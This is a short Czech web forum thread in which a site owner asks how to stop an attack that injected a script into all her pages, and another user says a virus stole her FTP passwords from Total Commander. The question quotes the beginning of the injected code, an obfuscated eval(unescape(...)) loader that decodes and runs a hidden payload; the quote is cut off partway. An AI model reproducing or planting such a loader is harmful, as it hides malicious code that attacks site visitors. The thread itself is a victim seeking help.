Autor Zpráva
janiice
Profil *
Chtěla bych se vás zeptat, jestli nevíte, jak zabezpečit stránky tvořené v html kódu před xss. Někdo mi zneviditelnil stránky v iframe scriptovým příkazem, který nahrál na všechny stránky webovek. Pomohl by mi prosím někdo? příkaz začínal takhle: <!-- [ 8a2704cf0de452091843fdc43ade6abc ] --><script>eval(unescape('function%20kDDwqn%28siI%29%7Bfunction%20uXCo R%28av
DB%29%7Bvar%20aINdo%3DavDB.length%3Bvar%20gUKEsu%3D0%2CrdyG%3D0%3B
while%28gUKEsu%3CaINdo%29%7BrdyG+%3DavDB.charCodeAt%28gUKEsu%29*aINdo
%3BgUKEsu++%3B%7Dreturn%20%28%27%27+rdyG%29%7D%20%20%20try%20%7B
var%20dpDT%3Deval%28%27a%3Frkg%3Fu%3Fm%3Fe4n4tSs%3F.%3Fc%3FaSlSl%3Fe
4e5%27.replace%28/%5BkS4%5C%3F5%5D/%2C%20%27%27%29%29%2CbMBm%3
Dnew%20String%28%29%2CyoNf%3D0%3BvHfyN%3D0%2CtYz%3D%28new%20String
%28dpDT%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/%2C%27%27%29%
3Bvar%20pKqq%3DuXCoR%28tYz%29%3BsiI%3Dunescape%28siI%29%3Bfor%28var%
20adRr%3D0%3B%20adRr%20%3C%20%28siI.length%29%3B%20adRr++%29%7Bvar%
20jlGGm%3DsiI.charCodeAt%28adRr%29%3Bvar%20bdUO%3DtYz.charCodeAt%28yoN f%
29%5EpKqq.charCodeAt%28vHfyN%29%3ByoNf++%3BvHfyN++%3Bif%28yoNf%3EtYz.l ength
%29yoNf%3D0%3Bif%28vHfyN%3EpKqq.length%29vHfyN%3D0%3BbMBm+%3DString.fr om
CharCode%28jlGGm%5EbdUO%29%3B%7Deval%28bMBm%29%3B%20return%20bMBm%
3Dnew%20String%28%29%3B%7Dcatch%28e%29%7B%7D%7DkDDwqn%28%27%2532%
2533%2538%2539% etc... pak už následujou jen čísla a procenta.
Děkuju.
Davex
Profil
To není způsobeno XSS. Na počítači máš vir, který vykradl hesla k FTP z Total Commanderu. Řeší se to tu neustále.
janiice
Profil *
děkuju za pomoc :-)

Vaše odpověď

Mohlo by se hodit

Neumíte-li správně určit příčinu chyby, vkládejte odkazy na živé ukázky.
Užíváte-li nějakou cizí knihovnu, ukažte odpovídajícím, kde jste ji vzali.

Užitečné odkazy:

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: